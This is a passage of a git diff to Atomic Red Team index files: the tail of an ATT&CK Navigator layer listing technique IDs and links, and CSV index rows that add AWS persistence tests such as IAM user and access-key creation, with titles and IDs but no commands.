ster/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 333ded94..8f50e385 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -492,6 +492,8 @@ persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debu persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell +persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh +persistence,T1098.001,Additional Cloud Credentials,1,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell @@ -510,6 +512,7 @@ persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a- persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt +persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash diff --git 